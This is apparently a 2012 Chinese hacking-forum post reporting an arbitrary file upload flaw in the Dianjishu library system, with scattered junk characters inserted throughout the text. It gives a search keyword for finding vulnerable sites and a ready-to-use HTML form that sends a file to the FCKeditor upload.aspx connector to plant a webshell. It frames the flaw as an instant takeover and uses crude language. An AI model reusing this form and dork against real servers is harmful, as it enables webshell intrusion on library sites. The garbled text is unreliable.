主题:图书馆系统任意文件上传漏洞
# o4 @. U, V4 @( F0 M9 q% ]5 ^ a0 Z# S 作者:冰锋刺客
. I0 }/ q6 m, s 厂商:点击书(dianjishu.com)
, v% @$ Q9 a U$ E& b; B1 u 日期:2012-6-21
$ r4 x4 L2 y4 Q1 V- j6 ]/ m$ N5 G! z
# Z/ ?6 J9 m8 DI 概述* W, h1 O2 A8 n; b* p. _
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell3 J: ?6 I- l+ L5 S/ ]5 v R
II 简介* |& O' f; x6 b; a: S
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
4 s1 [9 K. @4 b+ y9 K) s0 U- H 补充一个漏洞
; W( D* M' t: H <form id="frmUpload" enctype="multipart/form-data"
& o1 J* v% e1 Z1 Y4 L8 A) g4 n2 v action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
+ J& o- }6 m* B, U <input id="btnUpload" type="submit" value="操翻他">3 g- Q5 l0 H+ w3 r+ m
</form>' z0 n$ m* I7 M" \6 K: X* S
你们懂的& Q1 c* c% u( y% E4 d
那傻逼提供还需要改包.
0 ]5 H% g. T! k z 自己看了下源代码发现fckeditor
8 k; v! r) C8 G' W; A7 j/ t! o+ d M 直接秒杀0 I8 D) Q; w+ g6 V' t; F. @4 K* G
|
发表于 2012-9-10 21:20:59
收藏
支持
反对